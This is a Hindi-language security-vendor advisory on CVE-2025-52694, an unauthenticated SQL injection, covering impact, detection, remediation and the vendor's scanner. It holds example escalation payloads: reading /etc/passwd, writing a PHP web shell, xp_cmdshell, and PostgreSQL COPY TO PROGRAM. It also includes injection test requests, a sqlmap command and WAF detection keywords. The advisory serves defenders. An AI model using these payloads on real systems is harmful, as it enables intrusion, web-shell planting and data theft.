CVE-2025-52694: Unauthenticated SQL Injection Enables Arbitrary Command Execution on Exposed Services
बिना किसी ऑथेंटिकेशन की ज़रूरत वाली एक SQL इंजेक्शन भेद्यता रिमोट हमलावरों को भेद्य इंटरनेट-एक्सपोज़्ड सर्विस पर मनमाने SQL कमांड निष्पादित करने देती है, जो डेटा की गोपनीयता, अखंडता, और उपलब्धता को ख़तरे में डालती है। CVSS 10.0।
| फ़ील्ड | विवरण |
|---|---|
| CVE ID | CVE-2025-52694 |
| गंभीरता | क्रिटिकल (CVSS 3.1: 10.0) |
| भेद्यता प्रकार | SQL इंजेक्शन (CWE-89) |
| प्रकाशित | 12 जनवरी 2026 |
| ऑथेंटिकेशन आवश्यक | कोई नहीं |
| अटैक वेक्टर | नेटवर्क (इंटरनेट-फ़ेसिंग) |
CVE-2025-52694 क्या है?
CVE-2025-52694 एक इंटरनेट-एक्सपोज़्ड सर्विस में एक क्रिटिकल SQL इंजेक्शन भेद्यता है जिसे शोषण के लिए किसी ऑथेंटिकेशन की ज़रूरत नहीं है। हमलावर भेद्य सर्विस की डेटाबेस-क्वेरी में सीधे मनमाने SQL कमांड इंजेक्ट कर सकते हैं, जिससे संभावित रूप से सभी डेटाबेस-सामग्री पढ़ी या संशोधित की जा सकती है और — डेटाबेस-कॉन्फ़िगरेशन के आधार पर — अंतर्निहित सर्वर पर रिमोट कोड एक्ज़ीक्यूशन हासिल किया जा सकता है।
SQL इंजेक्शन अपनी शुरुआत से ही OWASP Top 10 में रहा है और मौजूद होने पर विनाशकारी रूप से प्रभावी बना रहता है। पूर्ण डेटा-एक्सेस वाली एक अनऑथेंटिकेटेड, नेटवर्क-सुलभ SQL इंजेक्शन उतनी ही ख़तरनाक है जितनी कोई भेद्यता हो सकती है — इसीलिए अधिकतम CVSS स्कोर है।
तकनीकी प्रभाव
⚠ पूर्ण CIA ट्रायड कॉम्प्रोमाइज़
गोपनीयता: सभी डेटाबेस-सामग्री पढ़ने योग्य — यूज़रनेम, पासवर्ड, PII, API की, वित्तीय डेटा।
अखंडता: डेटा संशोधन, रिकॉर्ड-हटाना, स्कीमा-परिवर्तन संभव।
उपलब्धता: संसाधन-समाप्त करने वाली क्वेरी के ज़रिए DoS हमले; डेटा-विनाश संभव।
SQL इंजेक्शन से RCE तक एस्केलेशन पथ
विस्तारित फ़ंक्शनैलिटी सक्षम वाले डेटाबेस पर, SQL इंजेक्शन ऑपरेटिंग-सिस्टम कमांड एक्ज़ीक्यूशन तक बढ़ सकता है:
-- MySQL with FILE privilege — read OS files
SELECT LOAD_FILE('/etc/passwd');
-- MySQL with INTO OUTFILE — write web shells
SELECT '<?php system($_GET["cmd"]); ?>'
INTO OUTFILE '/var/www/html/shell.php';
-- MSSQL with xp_cmdshell enabled
EXEC xp_cmdshell 'whoami';
-- PostgreSQL large object injection
SELECT lo_import('/etc/passwd');
CREATE OR REPLACE FUNCTION cmd(text) RETURNS text AS $$
DECLARE result text;
BEGIN
EXECUTE 'COPY (SELECT '') TO PROGRAM ''' || $1 || '''';
RETURN result;
END;
$$ LANGUAGE plpgsql;
प्रभावित वर्ज़न
विशिष्ट प्रोडक्ट और वर्ज़न जानकारी के लिए वेंडर एडवाइज़री देखें। इंटरनेट-ट्रैफ़िक के सामने उजागर, प्रभावित के रूप में सूचीबद्ध किसी भी वर्ज़न को सक्रिय रूप से शोषण-योग्य माना जाना चाहिए। तुरंत वेंडर-प्रदत्त पैच्ड वर्ज़न में अपडेट करें।
पहचान विधियाँ
मैनुअल SQL इंजेक्शन टेस्टिंग
# Basic error-based detection # Append ' to parameters and observe error responses GET /search?q=test' HTTP/1.1 # Boolean-based blind detection GET /search?q=test' AND 1=1-- - # Should return normal results GET /search?q=test' AND 1=2-- - # Should return empty/different results # Time-based blind detection (confirm injection) GET /search?q=test'; WAITFOR DELAY '0:0:5'-- - # MSSQL GET /search?q=test'; SELECT SLEEP(5)-- - # MySQL # Use SQLMap for automated exploitation confirmation (authorized testing only) sqlmap -u "https://target.com/page?id=1" --level=5 --risk=3 --dbs
WAF लॉग समीक्षा
SQL कीवर्ड सहित पैटर्न के लिए अपने WAF या एप्लिकेशन लॉग की समीक्षा करें (UNION SELECT, OR 1=1, SLEEP(, xp_cmdshell) रिक्वेस्ट-पैरामीटर में। CVE-2025-52694 के सक्रिय शोषण में ये पैटर्न दिखेंगे।
🔍 KENSAI पहचान: KENSAI का SQL Injection Scanner एरर-आधारित, ब्लाइंड, टाइम-आधारित, और आउट-ऑफ़-बैंड इंजेक्शन तकनीकों को कवर करता है। CVE-2025-52694 इंजेक्शन पैटर्न हमारी पेलोड-लाइब्रेरी में शामिल हैं और पैरामीटर, हेडर, और JSON/XML बॉडी-फ़ील्ड सहित सभी इनपुट-वेक्टर के ख़िलाफ़ मैच किए जाते हैं।
सुधार कदम
- तुरंत वेंडर पैच लागू करें: वेंडर एडवाइज़री में निर्दिष्ट पैच्ड वर्ज़न में अपडेट करें।
- पैरामीटराइज़्ड क्वेरी: सुनिश्चित करें कि सभी डेटाबेस-क्वेरी पैरामीटराइज़्ड इनपुट के साथ prepared statement का उपयोग करती हैं — SQL इंजेक्शन का यही एकमात्र विश्वसनीय फ़िक्स है।
- इनपुट वैलिडेशन: सभी यूज़र-प्रदत्त इनपुट को वैलिडेट और सैनिटाइज़ करें, जहाँ ज़रूरी न हो वहाँ SQL मेटाकैरेक्टर को अस्वीकार करें।
- न्यूनतम विशेषाधिकार: डेटाबेस-अकाउंट के पास न्यूनतम आवश्यक परमिशन होनी चाहिए — एप्लिकेशन-अकाउंट से कभी
saया root डेटाबेस-एक्सेस नहीं। - WAF नियम: SQL इंजेक्शन पेलोड का पता लगाने और ब्लॉक करने के लिए WAF नियम डिप्लॉय या अपडेट करें — यह एक क्षतिपूर्ति-नियंत्रण है, फ़िक्स नहीं।
- ख़तरनाक stored procedure अक्षम करें: जब तक स्पष्ट रूप से ज़रूरी न हो,
xp_cmdshellऔर अन्य OS-स्तर के डेटाबेस-फ़ंक्शन अक्षम करें। - नेटवर्क विभाजन: डेटाबेस सर्वर कभी भी सीधे इंटरनेट-सुलभ नहीं होने चाहिए।
KENSAI पहचान क्षमता
KENSAI CVE-2025-52694 सहित व्यापक SQL इंजेक्शन पहचान प्रदान करता है:
- सभी HTTP पैरामीटर, हेडर, और बॉडी-फ़ील्ड में स्वचालित इंजेक्शन टेस्टिंग
- एरर-आधारित, ब्लाइंड बूलियन, टाइम-आधारित, और UNION-आधारित इंजेक्शन पहचान
- शोषण-प्रभाव निर्धारित करने के लिए डेटाबेस फ़िंगरप्रिंटिंग
- सेकंड-ऑर्डर SQL इंजेक्शन पहचान
- CWE-89 और OWASP A03:2021 से मैप किया गया सुधार-मार्गदर्शन
आपके स्टैक में SQL इंजेक्शन?
KENSAI आपकी पूरी वेब-एप्लिकेशन अटैक-सतह को SQL इंजेक्शन और 200+ अन्य क्रिटिकल भेद्यताओं के लिए स्कैन करता है। किसी SQL इंजेक्शन को भंग न बनने दें।
SQL इंजेक्शन के लिए मुफ़्त स्कैन करेंKENSAI सुरक्षा शोध टीम द्वारा प्रकाशित · अधिक CVE विश्लेषण